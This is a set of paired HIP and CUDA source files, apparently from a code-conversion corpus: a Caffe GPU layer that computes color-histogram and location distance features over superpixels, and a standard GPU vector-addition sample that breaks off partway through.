color_mean[c] += data_slice[y * width + x]; // Bin size : 256 / 8 = 32 int bin_idx = data_slice[y * width + x] / 32; color_histo[c][bin_idx] += 1; } } color_mean[c] /= ((width / grid_size) * (height / grid_size)); for (int j = 0; j < 8; j++) { color_histo[c][j] /= ((width / grid_size) * (height / grid_size)); } } Handcrafted* current_hc = &(grid_features[output_idx]); for (int i = 0; i < channels; i++) { current_hc->color_mean[i] = color_mean[i]; for (int j = 0; j < 8; j++) { current_hc->color_histogram[i][j] = color_histo[i][j]; } } current_hc->center_location[0] = (y_start + y_end) / 2.0; current_hc->center_location[1] = (x_start + x_end) / 2.0; } } // Calculate Region features and label template <typename Dtype> __global__ void CalculateRegionFeatures(const int nthreads, const int num, const int channels, const int height, const int width, const int R, const int slic_xdim, const int slic_ydim, const int spixel_size, const Dtype* const data, const Dtype* const label_map, const Dtype* const slic_index_data, const float* const query_indexes, Handcrafted* query_features, Dtype* label_output, Dtype* query_output) { CUDA_KERNEL_LOOP(c_index, nthreads) { const int n = c_index / channels / R; const int index = c_index / channels; const int current_channel = c_index % channels; const int query_sp_idx = query_indexes[index]; const int slic_yind = query_sp_idx / slic_xdim; const int slic_xind = query_sp_idx % slic_xdim; const int x_start = max((slic_xind - 2) * spixel_size, 0); const int x_end = min((slic_xind + 2) * spixel_size, width); const int y_start = max((slic_yind - 2) * spixel_size, 0); const int y_end = min((slic_yind + 2) * spixel_size, height); float color_mean = 0; float color_histo[8] = {0}; float center_x = 0; float center_y = 0; if (label_map != NULL && current_channel == 0) { int count = 0; label_output[index] = 0; for (int y = y_start; y < y_end; y++) { for (int x = x_start; x < x_end; x++) { if (slic_index_data[(n * height + y) * width + x] == query_sp_idx) { label_output[index] += label_map[(n * height + y) * width + x]; count += 1; } } } if (count != 0) { label_output[index] /= count; } else { label_output[index] = 255; } } // copy index in order to synchronize depth current and mcs current query_output[index] = query_indexes[index]; const Dtype* data_slice = data + (n * channels + current_channel) * height * width; int count = 0; for (int y = y_start; y < y_end; y++) { for (int x = x_start; x < x_end; x++) { if (slic_index_data[(n * height + y) * width + x] == query_sp_idx) { //printf("slic_index_data : %f \n", slic_index_data[(n * height + y) * width + x]); // printf("(n * height + y) * width + x : %d \n", // (n * height + y) * width + x); //printf("query_sp_idx : %d \n", query_sp_idx); // printf("data_slice : %f \n", data_slice[y * width + x]); count += 1; color_mean += data_slice[y * width + x]; int bin_idx = data_slice[y * width + x] / 32; color_histo[bin_idx] += 1; if (current_channel == 0) { center_x += x; center_y += y; } } } } if (count == 0) { count = 1; } color_mean /= count; if (current_channel == 0) { center_x /= count; center_y /= count; } for (int j = 0; j < 8; j++) { color_histo[j] /= count; } Handcrafted* current_hc = &(query_features[index]); for (int i = 0; i < channels; i++) { current_hc->color_mean[current_channel] = color_mean; for (int j = 0; j < 8; j++) { current_hc->color_histogram[current_channel][j] = color_histo[j]; } } if (current_channel == 0) { current_hc->center_location[0] = center_y; current_hc->center_location[1] = center_x; } } } __device__ inline int GetOffset(const int n, const int c, const int h, const int w, const int C, const int H, const int W) { return (((n * C + c) * H + h) * W + w); } // Calculate distance between query and grid features template <typename Dtype> __global__ void CalculateDistanceBetweenQueryAndGrid(const int nthreads, const int N, const int R, const int channels, const int height, const int width, const int grid_size, const int dim_output, const Handcrafted* grid_features, const Handcrafted* query_features, Dtype* const top_data, int option) { CUDA_KERNEL_LOOP(c_index, nthreads) { const int n = c_index / channels / R; const int index = c_index / channels; const int current_channel = c_index % channels; //const int r = index % R; const Handcrafted* sliced_grid_features = &(grid_features[n * grid_size * grid_size]); const Handcrafted* current_query_features = &(query_features[index]); for (int gx = 0; gx < grid_size; gx++) { for (int gy = 0; gy < grid_size; gy++) { int grid_index = gy * grid_size + gx; int chidx = current_channel * (dim_output - 2) / channels; // top channel index // BGR color difference float grid_val = sliced_grid_features[grid_index].color_mean[current_channel]; float query_val = current_query_features->color_mean[current_channel]; if (option != 1) { // Query region val *(top_data + GetOffset(index, chidx, gy, gx, dim_output, grid_size, grid_size)) = query_val/256 - 0.5; //printf("mcs_query_val: %f \n", query_val/256 - 0.5); chidx += 1; *(top_data + GetOffset(index, chidx, gy, gx, dim_output, grid_size, grid_size)) = grid_val/256 - 0.5; //printf("mcs_query_val: %f \n", grid_val/256 - 0.5); chidx += 1; } if (option == 0) { // histogram for (int b = 0; b < 8; b++) { float tmp1 = sliced_grid_features[grid_index].color_histogram[current_channel][b]; float tmp2 = current_query_features->color_histogram[current_channel][b]; *(top_data + GetOffset(index, chidx, gy, gx, dim_output, grid_size, grid_size)) = tmp1; chidx += 1; *(top_data + GetOffset(index, chidx, gy, gx, dim_output, grid_size, grid_size)) = tmp2; chidx += 1; } } else if (option == 3) { float sum = 0; for (int b = 0; b < 8; b++) { float tmp1 = sliced_grid_features[grid_index].color_histogram[current_channel][b]; float tmp2 = current_query_features->color_histogram[current_channel][b]; sum += 2 * (tmp1 - tmp2) * (tmp1 - tmp2) / (tmp1 + tmp2 + 0.00000001); } *(top_data + GetOffset(index, chidx, gy, gx, dim_output, grid_size, grid_size)) = sum / 4.0; chidx += 1; } if (current_channel == channels - 1) { // Location difference *(top_data + GetOffset(index, dim_output - 2, gy, gx, dim_output, grid_size, grid_size)) = (sliced_grid_features[grid_index].center_location[0] - current_query_features->center_location[0])/(height/2); *(top_data + GetOffset(index, dim_output - 1, gy, gx, dim_output, grid_size, grid_size)) = (sliced_grid_features[grid_index].center_location[1] - current_query_features->center_location[1])/(width/2); } } } } } // Pick R regions to query template<typename Dtype> void LowlevelDistanceLayer<Dtype>::PickQueryRegions(const Blob<Dtype>* dead_spmap) { int N = dead_spmap->shape(0); int map_h = dead_spmap->shape(2); int map_w = dead_spmap->shape(3); //printf("R_ : %d \n", R_); //printf("map_w * map_h * N : %d \n", map_w * map_h * N); if (R_ == map_w * map_h * N) { // test phase. query all regions float* qindx_ptr = query_region_indexes_.mutable_cpu_data(); for (int i = 0; i < R_; i++) { *qindx_ptr = i; qindx_ptr += query_region_indexes_.offset(0, 1); } } else { float* const qindx_ptr = query_region_indexes_.mutable_cpu_data(); for (int n = 0; n < N; n++) { vector<float> candidates; // Pick R regions const Dtype* dead_spmap_ptr = dead_spmap->cpu_data() + dead_spmap->offset(n); for (int w = 0; w < map_w; w++) { for (int h = 0; h < map_h; h++) { bool is_dead = (dead_spmap_ptr[dead_spmap->offset(0, 0, h, w)] == 1); if (!is_dead) { candidates.push_back(h*map_w + w); } } } // randomly pick R superpixels std::random_shuffle(candidates.begin(), candidates.end()); for (int r = 0; r < R_; r++) { qindx_ptr[query_region_indexes_.offset(n, r)] = candidates[r]; } } } } template<typename Dtype> void generate_multicolor_data(const Blob<Dtype>& data, Blob<Dtype>* const mcs_data) { const Dtype* data_cpu = data.cpu_data(); Dtype* mcs_data_cpu_ptr = mcs_data->mutable_cpu_data(); int num = data.shape(0); int channels = data.shape(1); int height = data.shape(2); int width = data.shape(3); int mcs_channels = mcs_data->shape(1); const unsigned char MEAN[3] = {104, 117, 123}; cv::Mat bgr_mat(height, width, CV_8UC3); cv::Mat hsv_mat; cv::Mat lab_mat; for (int n = 0; n < num; n++) { for (int c = 0; c < channels; c++) { for (int h = 0; h < height; h++) { for (int w = 0; w < width; w++) { bgr_mat.at<cv::Vec3b>(h, w)[c] = static_cast<unsigned char>( data_cpu[((n * channels + c) * height + h) * width + w] + MEAN[c]); } } } cv::cvtColor(bgr_mat, hsv_mat, CV_BGR2HSV); cv::cvtColor(bgr_mat, lab_mat, CV_BGR2Lab); // convert to blob for (int c = 0; c < channels; c++) { for (int h = 0; h < height; h++) { for (int w = 0; w < width; w++) { mcs_data_cpu_ptr[((n * mcs_channels + c) * height + h) * width + w] = static_cast<float>(bgr_mat.at<cv::Vec3b>(h, w)[c]); mcs_data_cpu_ptr[((n * mcs_channels + c + 3) * height + h) * width + w] = static_cast<float>(hsv_mat.at<cv::Vec3b>(h, w)[c]); mcs_data_cpu_ptr[((n * mcs_channels + c + 6) * height + h) * width + w] = static_cast<float>(lab_mat.at<cv::Vec3b>(h, w)[c]); } } } } } // --------------------------------------------------- // // Caffe forward implementation // // --------------------------------------------------- template <typename Dtype> void LowlevelDistanceLayer<Dtype>::Forward_gpu(const vector<Blob<Dtype>*>& bottom, const vector<Blob<Dtype>*>& top) { // bottom[0] : data, bottom[1] : slic_index, bottom[2] : dead map // bottom[3] : label_map // Prepare various channel data and gabor filtered map // data blob to Mat CHECK_EQ(bottom[0]->shape(1), 3); const int mcs_channels = 9; Blob<Dtype> mcs_data(N_, mcs_channels, H_, W_); // multi colorspaces data generate_multicolor_data(*bottom[0], &mcs_data); // Calculate grid features int block_cnt = N_ * grid_size_ * grid_size_; Handcrafted* grid_fptr = grid_features_.mutable_gpu_data(); const Dtype* mcs_gpu_ptr = mcs_data.mutable_gpu_data(); hipLaunchKernelGGL(( CalculateGridFeatures), dim3(CAFFE_GET_BLOCKS(block_cnt)), dim3(CAFFE_CUDA_NUM_THREADS), 0, 0, block_cnt, grid_size_, N_, mcs_channels, H_, W_, mcs_gpu_ptr, grid_fptr); // Select R regions per an image for training PickQueryRegions(bottom[2]); // Calculate query features and its label // N * R block_cnt = N_ * R_ * mcs_channels; int slic_xdim = bottom[2]->shape(3); int slic_ydim = bottom[2]->shape(2); const Dtype* labelmap_ptr = NULL; if (bottom.size() > 3) { labelmap_ptr = bottom[3]->gpu_data(); } const Dtype* slic_idx_ptr = bottom[1]->gpu_data(); const float* query_idx_ptr = query_region_indexes_.gpu_data(); Handcrafted* query_fptr = query_features_.mutable_gpu_data(); Dtype* label_output = NULL; Dtype* query_output = NULL; if (top.size() > 1) { label_output = top[1]->mutable_gpu_data(); //printf("clear1\n"); query_output = top[2]->mutable_gpu_data(); } //printf("clear2\n"); hipLaunchKernelGGL(( CalculateRegionFeatures), dim3(CAFFE_GET_BLOCKS(block_cnt)), dim3(CAFFE_CUDA_NUM_THREADS), 0, 0, block_cnt, N_, mcs_channels, H_, W_, R_, slic_xdim, slic_ydim, sp_size_, mcs_gpu_ptr, labelmap_ptr, slic_idx_ptr, query_idx_ptr, query_fptr, label_output, query_output); // Calculate low level distance const Handcrafted* updated_grid_fptr = grid_features_.gpu_data(); const Handcrafted* updated_query_fptr = query_features_.gpu_data(); hipLaunchKernelGGL(( CalculateDistanceBetweenQueryAndGrid), dim3(CAFFE_GET_BLOCKS(block_cnt)), dim3(CAFFE_CUDA_NUM_THREADS), 0, 0, block_cnt, N_, R_, mcs_channels, H_, W_, grid_size_, dim_output_, updated_grid_fptr, updated_query_fptr, top[0]->mutable_gpu_data(), hf_option_); /* const Dtype* check = top[0]->cpu_data(); int n = 0; for (int c = 0; c < 29; c++) { for (int i = 0; i < 18; i++) { for (int j = 0; j < 18; j ++) { cout << *(check + (((n * R_ + 1)* dim_output_ + c)*18 + i) *18 + j) << ", "; } cout << endl; } cout << "------------------------------------------" << endl; } cout << "============================================" << endl; */ } INSTANTIATE_LAYER_GPU_FUNCS(LowlevelDistanceLayer); } // namespace caffe
4ae4d817aeba51488562dce2a1e5f6feede2c4e5.cu
#include <iostream> #include <cstdio> #include <opencv2/core/core.hpp> #include <opencv2/imgproc/imgproc.hpp> #include <opencv2/highgui/highgui.hpp> #include <boost/chrono.hpp> #include "caffe/layers/lowlevel_distance_layer.hpp" using std::cout; using std::endl; using cv::Mat; namespace caffe { // Calculate Grid features template <typename Dtype> __global__ void CalculateGridFeatures(const int nthreads, const int grid_size, const int num, const int channels, const int height, const int width, const Dtype* const data, Handcrafted* grid_features) { CUDA_KERNEL_LOOP(index, nthreads) { const int n = index / (grid_size * grid_size); const int grid_index = index % (grid_size * grid_size); const int grid_x = grid_index % grid_size; const int grid_y = grid_index / grid_size; const int output_idx = (n * grid_size + grid_y) * grid_size + grid_x; const int x_start = grid_x * (width / grid_size); const int x_end = (grid_x + 1) * (width / grid_size) - 1; const int y_start = grid_y * (height / grid_size); const int y_end = (grid_y + 1) * (height / grid_size) - 1; float color_mean[10] = {0}; float color_histo[10][8] = {0}; // collect features for (int c = 0; c < channels; c++) { // (0, 1, 2) : 0-mean normalized BGR data const Dtype* data_slice = data + (n * channels + c) * height * width; for (int y = y_start; y < y_end; y++) { for (int x = x_start; x < x_end; x++) { color_mean[c] += data_slice[y * width + x]; // Bin size : 256 / 8 = 32 int bin_idx = data_slice[y * width + x] / 32; color_histo[c][bin_idx] += 1; } } color_mean[c] /= ((width / grid_size) * (height / grid_size)); for (int j = 0; j < 8; j++) { color_histo[c][j] /= ((width / grid_size) * (height / grid_size)); } } Handcrafted* current_hc = &(grid_features[output_idx]); for (int i = 0; i < channels; i++) { current_hc->color_mean[i] = color_mean[i]; for (int j = 0; j < 8; j++) { current_hc->color_histogram[i][j] = color_histo[i][j]; } } current_hc->center_location[0] = (y_start + y_end) / 2.0; current_hc->center_location[1] = (x_start + x_end) / 2.0; } } // Calculate Region features and label template <typename Dtype> __global__ void CalculateRegionFeatures(const int nthreads, const int num, const int channels, const int height, const int width, const int R, const int slic_xdim, const int slic_ydim, const int spixel_size, const Dtype* const data, const Dtype* const label_map, const Dtype* const slic_index_data, const float* const query_indexes, Handcrafted* query_features, Dtype* label_output, Dtype* query_output) { CUDA_KERNEL_LOOP(c_index, nthreads) { const int n = c_index / channels / R; const int index = c_index / channels; const int current_channel = c_index % channels; const int query_sp_idx = query_indexes[index]; const int slic_yind = query_sp_idx / slic_xdim; const int slic_xind = query_sp_idx % slic_xdim; const int x_start = max((slic_xind - 2) * spixel_size, 0); const int x_end = min((slic_xind + 2) * spixel_size, width); const int y_start = max((slic_yind - 2) * spixel_size, 0); const int y_end = min((slic_yind + 2) * spixel_size, height); float color_mean = 0; float color_histo[8] = {0}; float center_x = 0; float center_y = 0; if (label_map != NULL && current_channel == 0) { int count = 0; label_output[index] = 0; for (int y = y_start; y < y_end; y++) { for (int x = x_start; x < x_end; x++) { if (slic_index_data[(n * height + y) * width + x] == query_sp_idx) { label_output[index] += label_map[(n * height + y) * width + x]; count += 1; } } } if (count != 0) { label_output[index] /= count; } else { label_output[index] = 255; } } // copy index in order to synchronize depth current and mcs current query_output[index] = query_indexes[index]; const Dtype* data_slice = data + (n * channels + current_channel) * height * width; int count = 0; for (int y = y_start; y < y_end; y++) { for (int x = x_start; x < x_end; x++) { if (slic_index_data[(n * height + y) * width + x] == query_sp_idx) { //printf("slic_index_data : %f \n", slic_index_data[(n * height + y) * width + x]); // printf("(n * height + y) * width + x : %d \n", // (n * height + y) * width + x); //printf("query_sp_idx : %d \n", query_sp_idx); // printf("data_slice : %f \n", data_slice[y * width + x]); count += 1; color_mean += data_slice[y * width + x]; int bin_idx = data_slice[y * width + x] / 32; color_histo[bin_idx] += 1; if (current_channel == 0) { center_x += x; center_y += y; } } } } if (count == 0) { count = 1; } color_mean /= count; if (current_channel == 0) { center_x /= count; center_y /= count; } for (int j = 0; j < 8; j++) { color_histo[j] /= count; } Handcrafted* current_hc = &(query_features[index]); for (int i = 0; i < channels; i++) { current_hc->color_mean[current_channel] = color_mean; for (int j = 0; j < 8; j++) { current_hc->color_histogram[current_channel][j] = color_histo[j]; } } if (current_channel == 0) { current_hc->center_location[0] = center_y; current_hc->center_location[1] = center_x; } } } __device__ inline int GetOffset(const int n, const int c, const int h, const int w, const int C, const int H, const int W) { return (((n * C + c) * H + h) * W + w); } // Calculate distance between query and grid features template <typename Dtype> __global__ void CalculateDistanceBetweenQueryAndGrid(const int nthreads, const int N, const int R, const int channels, const int height, const int width, const int grid_size, const int dim_output, const Handcrafted* grid_features, const Handcrafted* query_features, Dtype* const top_data, int option) { CUDA_KERNEL_LOOP(c_index, nthreads) { const int n = c_index / channels / R; const int index = c_index / channels; const int current_channel = c_index % channels; //const int r = index % R; const Handcrafted* sliced_grid_features = &(grid_features[n * grid_size * grid_size]); const Handcrafted* current_query_features = &(query_features[index]); for (int gx = 0; gx < grid_size; gx++) { for (int gy = 0; gy < grid_size; gy++) { int grid_index = gy * grid_size + gx; int chidx = current_channel * (dim_output - 2) / channels; // top channel index // BGR color difference float grid_val = sliced_grid_features[grid_index].color_mean[current_channel]; float query_val = current_query_features->color_mean[current_channel]; if (option != 1) { // Query region val *(top_data + GetOffset(index, chidx, gy, gx, dim_output, grid_size, grid_size)) = query_val/256 - 0.5; //printf("mcs_query_val: %f \n", query_val/256 - 0.5); chidx += 1; *(top_data + GetOffset(index, chidx, gy, gx, dim_output, grid_size, grid_size)) = grid_val/256 - 0.5; //printf("mcs_query_val: %f \n", grid_val/256 - 0.5); chidx += 1; } if (option == 0) { // histogram for (int b = 0; b < 8; b++) { float tmp1 = sliced_grid_features[grid_index].color_histogram[current_channel][b]; float tmp2 = current_query_features->color_histogram[current_channel][b]; *(top_data + GetOffset(index, chidx, gy, gx, dim_output, grid_size, grid_size)) = tmp1; chidx += 1; *(top_data + GetOffset(index, chidx, gy, gx, dim_output, grid_size, grid_size)) = tmp2; chidx += 1; } } else if (option == 3) { float sum = 0; for (int b = 0; b < 8; b++) { float tmp1 = sliced_grid_features[grid_index].color_histogram[current_channel][b]; float tmp2 = current_query_features->color_histogram[current_channel][b]; sum += 2 * (tmp1 - tmp2) * (tmp1 - tmp2) / (tmp1 + tmp2 + 0.00000001); } *(top_data + GetOffset(index, chidx, gy, gx, dim_output, grid_size, grid_size)) = sum / 4.0; chidx += 1; } if (current_channel == channels - 1) { // Location difference *(top_data + GetOffset(index, dim_output - 2, gy, gx, dim_output, grid_size, grid_size)) = (sliced_grid_features[grid_index].center_location[0] - current_query_features->center_location[0])/(height/2); *(top_data + GetOffset(index, dim_output - 1, gy, gx, dim_output, grid_size, grid_size)) = (sliced_grid_features[grid_index].center_location[1] - current_query_features->center_location[1])/(width/2); } } } } } // Pick R regions to query template<typename Dtype> void LowlevelDistanceLayer<Dtype>::PickQueryRegions(const Blob<Dtype>* dead_spmap) { int N = dead_spmap->shape(0); int map_h = dead_spmap->shape(2); int map_w = dead_spmap->shape(3); //printf("R_ : %d \n", R_); //printf("map_w * map_h * N : %d \n", map_w * map_h * N); if (R_ == map_w * map_h * N) { // test phase. query all regions float* qindx_ptr = query_region_indexes_.mutable_cpu_data(); for (int i = 0; i < R_; i++) { *qindx_ptr = i; qindx_ptr += query_region_indexes_.offset(0, 1); } } else { float* const qindx_ptr = query_region_indexes_.mutable_cpu_data(); for (int n = 0; n < N; n++) { vector<float> candidates; // Pick R regions const Dtype* dead_spmap_ptr = dead_spmap->cpu_data() + dead_spmap->offset(n); for (int w = 0; w < map_w; w++) { for (int h = 0; h < map_h; h++) { bool is_dead = (dead_spmap_ptr[dead_spmap->offset(0, 0, h, w)] == 1); if (!is_dead) { candidates.push_back(h*map_w + w); } } } // randomly pick R superpixels std::random_shuffle(candidates.begin(), candidates.end()); for (int r = 0; r < R_; r++) { qindx_ptr[query_region_indexes_.offset(n, r)] = candidates[r]; } } } } template<typename Dtype> void generate_multicolor_data(const Blob<Dtype>& data, Blob<Dtype>* const mcs_data) { const Dtype* data_cpu = data.cpu_data(); Dtype* mcs_data_cpu_ptr = mcs_data->mutable_cpu_data(); int num = data.shape(0); int channels = data.shape(1); int height = data.shape(2); int width = data.shape(3); int mcs_channels = mcs_data->shape(1); const unsigned char MEAN[3] = {104, 117, 123}; cv::Mat bgr_mat(height, width, CV_8UC3); cv::Mat hsv_mat; cv::Mat lab_mat; for (int n = 0; n < num; n++) { for (int c = 0; c < channels; c++) { for (int h = 0; h < height; h++) { for (int w = 0; w < width; w++) { bgr_mat.at<cv::Vec3b>(h, w)[c] = static_cast<unsigned char>( data_cpu[((n * channels + c) * height + h) * width + w] + MEAN[c]); } } } cv::cvtColor(bgr_mat, hsv_mat, CV_BGR2HSV); cv::cvtColor(bgr_mat, lab_mat, CV_BGR2Lab); // convert to blob for (int c = 0; c < channels; c++) { for (int h = 0; h < height; h++) { for (int w = 0; w < width; w++) { mcs_data_cpu_ptr[((n * mcs_channels + c) * height + h) * width + w] = static_cast<float>(bgr_mat.at<cv::Vec3b>(h, w)[c]); mcs_data_cpu_ptr[((n * mcs_channels + c + 3) * height + h) * width + w] = static_cast<float>(hsv_mat.at<cv::Vec3b>(h, w)[c]); mcs_data_cpu_ptr[((n * mcs_channels + c + 6) * height + h) * width + w] = static_cast<float>(lab_mat.at<cv::Vec3b>(h, w)[c]); } } } } } // --------------------------------------------------- // // Caffe forward implementation // // --------------------------------------------------- template <typename Dtype> void LowlevelDistanceLayer<Dtype>::Forward_gpu(const vector<Blob<Dtype>*>& bottom, const vector<Blob<Dtype>*>& top) { // bottom[0] : data, bottom[1] : slic_index, bottom[2] : dead map // bottom[3] : label_map // Prepare various channel data and gabor filtered map // data blob to Mat CHECK_EQ(bottom[0]->shape(1), 3); const int mcs_channels = 9; Blob<Dtype> mcs_data(N_, mcs_channels, H_, W_); // multi colorspaces data generate_multicolor_data(*bottom[0], &mcs_data); // Calculate grid features int block_cnt = N_ * grid_size_ * grid_size_; Handcrafted* grid_fptr = grid_features_.mutable_gpu_data(); const Dtype* mcs_gpu_ptr = mcs_data.mutable_gpu_data(); CalculateGridFeatures<<<CAFFE_GET_BLOCKS(block_cnt), CAFFE_CUDA_NUM_THREADS>>>(block_cnt, grid_size_, N_, mcs_channels, H_, W_, mcs_gpu_ptr, grid_fptr); // Select R regions per an image for training PickQueryRegions(bottom[2]); // Calculate query features and its label // N * R block_cnt = N_ * R_ * mcs_channels; int slic_xdim = bottom[2]->shape(3); int slic_ydim = bottom[2]->shape(2); const Dtype* labelmap_ptr = NULL; if (bottom.size() > 3) { labelmap_ptr = bottom[3]->gpu_data(); } const Dtype* slic_idx_ptr = bottom[1]->gpu_data(); const float* query_idx_ptr = query_region_indexes_.gpu_data(); Handcrafted* query_fptr = query_features_.mutable_gpu_data(); Dtype* label_output = NULL; Dtype* query_output = NULL; if (top.size() > 1) { label_output = top[1]->mutable_gpu_data(); //printf("clear1\n"); query_output = top[2]->mutable_gpu_data(); } //printf("clear2\n"); CalculateRegionFeatures<<<CAFFE_GET_BLOCKS(block_cnt), CAFFE_CUDA_NUM_THREADS>>>(block_cnt, N_, mcs_channels, H_, W_, R_, slic_xdim, slic_ydim, sp_size_, mcs_gpu_ptr, labelmap_ptr, slic_idx_ptr, query_idx_ptr, query_fptr, label_output, query_output); // Calculate low level distance const Handcrafted* updated_grid_fptr = grid_features_.gpu_data(); const Handcrafted* updated_query_fptr = query_features_.gpu_data(); CalculateDistanceBetweenQueryAndGrid<<<CAFFE_GET_BLOCKS(block_cnt), CAFFE_CUDA_NUM_THREADS>>>(block_cnt, N_, R_, mcs_channels, H_, W_, grid_size_, dim_output_, updated_grid_fptr, updated_query_fptr, top[0]->mutable_gpu_data(), hf_option_); /* const Dtype* check = top[0]->cpu_data(); int n = 0; for (int c = 0; c < 29; c++) { for (int i = 0; i < 18; i++) { for (int j = 0; j < 18; j ++) { cout << *(check + (((n * R_ + 1)* dim_output_ + c)*18 + i) *18 + j) << ", "; } cout << endl; } cout << "------------------------------------------" << endl; } cout << "============================================" << endl; */ } INSTANTIATE_LAYER_GPU_FUNCS(LowlevelDistanceLayer); } // namespace caffe
b2a6e599080fe83030f5fea837292147d0de6e9b.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" #include "device_launch_parameters.h" #include <stdio.h> #include <iostream> #include "../HighPerformanceTimer/HighPerformanceTimer.h" hipError_t addWithCuda(int *c, const int *a, const int *b, unsigned int size); __global__ void addKernel(int *c, const int *a, const int *b) { int i = threadIdx.x; c[i] = a[i] + b[i]; } int main() { const int arraySize = 5; const int a[arraySize] = { 1, 2, 3, 4, 5 }; const int b[arraySize] = { 10, 20, 30, 40, 50 }; int c[arraySize] = { 0 }; HighPrecisionTime h; try { // Add vectors in parallel. h.TimeSinceLastCall(); hipError_t cudaStatus = addWithCuda(c, a, b, arraySize); double t = h.TimeSinceLastCall(); std::cout << t << std::endl; if (cudaStatus != hipSuccess) { //fprintf(stderr, "addWithCuda failed!"); //return 1; throw("addWithCuda failed!"); } printf("{1,2,3,4,5} + {10,20,30,40,50} = {%d,%d,%d,%d,%d}\n", c[0], c[1], c[2], c[3], c[4]); // hipDeviceReset must be called before exiting in order for profiling and // tracing tools such as Nsight and Visual Profiler to show complete traces. cudaStatus = hipDeviceReset(); if (cudaStatus != hipSuccess) { //fprintf(stderr, "hipDeviceReset failed!"); //return 1; throw("hipDeviceReset failed!"); } } catch (char* error_message) { std::cout << error_message << std::endl; } #ifdef _WIN32 || _WIN64 system("pause"); #endif return 0; } // Helper function for using CUDA to add vectors in parallel. hipError_t addWithCuda(int *c, const int *a, const int *b, unsigned int size) { int *dev_a = 0; int *dev_b = 0; int *dev_c = 0; hipError_t cudaStatus; // Choose which GPU to run on, change this on a multi-GPU system. cudaStatus = hipSetDevice(0); if (cudaStatus != hipSuccess) { fprintf(stderr, "hipSetDevice failed! Do you have a CUDA-capable GPU installed?"); goto Error; } // Allocate GPU buffers for three vectors (two input, one output) . cudaStatus = hipMalloc((void**)&dev_c, size * sizeof(int)); if (cudaStatus != hipSuccess) { fprintf(stderr, "hipMalloc failed!"); goto Error; } cudaStatus = hipMalloc((void**)&dev_a, size * sizeof(int)); if (cudaStatus != hipSuccess) { fprintf(stderr, "hipMalloc failed!"); goto Error; } cudaStatus = hipMalloc((void**)&dev_b, size * sizeof(int)); if (cudaStatus != hipSuccess) { fprintf(stderr, "hipMalloc failed!"); goto Error; } // Copy input vectors from host memory to GPU buffers. cudaStatus = hipMemcpy(dev_a, a, size * sizeof(int), hipMemcpyHostToDevice); if (cudaStatus != hipSuccess) { fprintf(stderr, "hipMemcpy failed!"); goto Error; } cudaStatus = hipMemcpy(dev_b, b, size * sizeof(int), hipMemcpyHostToDevice); if (cudaStatus != hipSuccess) { fprintf(stderr, "hipMemcpy failed!"); goto Error; } // Launch a kernel on the GPU with one thread for each element. hipLaunchKernelGGL(( addKernel), dim3(1), dim3(size), 0, 0, dev_c, dev_a, dev_b); // Check for any errors launching the kernel cudaStatus = hipGetLastError(); if (cudaStatus != hipSuccess) { fprintf(stderr, "addKernel launch failed: %s\n", hipGetErrorString(cudaStatus)); goto Error; } // hipDeviceSynchronize waits for the kernel to finish, and returns // any errors encountered during the launch. cudaStatus = hipDeviceSynchronize(); if (cudaStatus != hipSuccess) { fprintf(stderr, "hipDeviceSynchronize returned error code %d after launching addKernel!\n", cudaStatus); goto Error; } // Copy output vector from GPU buffer to host memory. cudaStatus = hipMemcpy(c, dev_c, size * sizeof(int), hipMemcpyDeviceToHost); if (cudaStatus != hipSuccess) { fprintf(stderr, "hipMemcpy failed!"); goto Error; } Error: hipFree(dev_c); hipFree(dev_a); hipFree(dev_b); return cudaStatus; }
b2a6e599080fe83030f5fea837292147d0de6e9b.cu
#include "cuda_runtime.h" #include "device_launch_parameters.h" #include <stdio.h> #include <iostream> #include "../HighPerformanceTimer/HighPerformanceTimer.h" cudaError_t addWithCuda(int *c, const int *a, const int *b, unsigned int size); __global__ void addKernel(int *c, const int *a, const int *b) { int i = threadIdx.x; c[i] = a[i] + b[i]; } int main() { const int arraySize = 5; const int a[arraySize] = { 1, 2, 3, 4, 5 }; const int b[arraySize] = { 10, 20, 30, 40, 50 }; int c[arraySize] = { 0 }; HighPrecisionTime h; try { // Add vectors in parallel. h.TimeSinceLastCall(); cudaError_t cudaStatus = addWithCuda(c, a, b, arraySize); double t = h.TimeSinceLastCall(); std::cout << t << std::endl; if (cudaStatus != cudaSuccess) { //fprintf(stderr, "addWithCuda failed!"); //return 1; throw("addWithCuda failed!"); } printf("{1,2,3,4,5} + {10,20,30,40,50} = {%d,%d,%d,%d,%d}\n", c[0], c[1], c[2], c[3], c[4]); // cudaDeviceReset must be called before exiting in order for profiling and // tracing tools such as Nsight and Visual Profiler to show complete traces. cudaStatus = cudaDeviceReset(); if (cudaStatus != cudaSuccess) { //fprintf(stderr, "cudaDeviceReset failed!"); //return 1; throw("cudaDeviceReset failed!"); } } catch (char* error_message) { std::cout << error_message << std::endl; } #ifdef _WIN32 || _WIN64 system("pause"); #endif return 0; } // Helper function for using CUDA to add vectors in parallel. cudaError_t addWithCuda(int *c, const int *a, const int *b, unsigned int size) { int *dev_a = 0; int *dev_b = 0; int *dev_c = 0; cudaError_t cudaStatus; // Choose which GPU to run on, change this on a multi-GPU system. cudaStatus = cudaSetDevice(0); if (cudaStatus != cudaSuccess) { fprintf(stderr, "cudaSetDevice failed! Do you have a CUDA-capable GPU installed?"); goto Error; } // Allocate GPU buffers for three vectors (two input, one output) . cudaStatus = cudaMalloc((void**)&dev_c, size * sizeof(int)); if (cudaStatus != cudaSuccess) { fprintf(stderr, "cudaMalloc failed!"); goto Error; } cudaStatus = cudaMalloc((void**)&dev_a, size * sizeof(int)); if (cudaStatus != cudaSuccess) { fprintf(stderr, "cudaMalloc failed!"); goto Error; } cudaStatus = cudaMalloc((void**)&dev_b, size * sizeof(int)); if (cudaStatus != cudaSuccess) { fprintf(stderr, "cudaMalloc failed!"); goto Error; } // Copy input vectors from host memory to GPU buffers. cudaStatus = cudaMemcpy(dev_a, a, size * sizeof(int), cudaMemcpyHostToDevice); if (cudaStatus != cudaSuccess) { fprintf(stderr, "cudaMemcpy failed!"); goto Error; } cudaStatus = cudaMemcpy(dev_b, b, size * sizeof(int), cudaMemcpyHostToDevice); if (cudaStatus != cudaSuccess) { fprintf(stderr, "cudaMemcpy failed!"); goto Error; } // Launch a kernel on the GPU with one thread for each element. addKernel<<<1, size>>>(dev_c, dev_a, dev_b); // Check for any errors launching the kernel cudaStatus = cudaGetLastError(); if (cudaStatus != cudaSuccess) { fprintf(stderr, "addKernel launch failed: %s\n", cudaGetErrorString(cudaStatus)); goto Error; } // cudaDeviceSynchronize waits for the kernel to finish, and returns // any errors encountered during 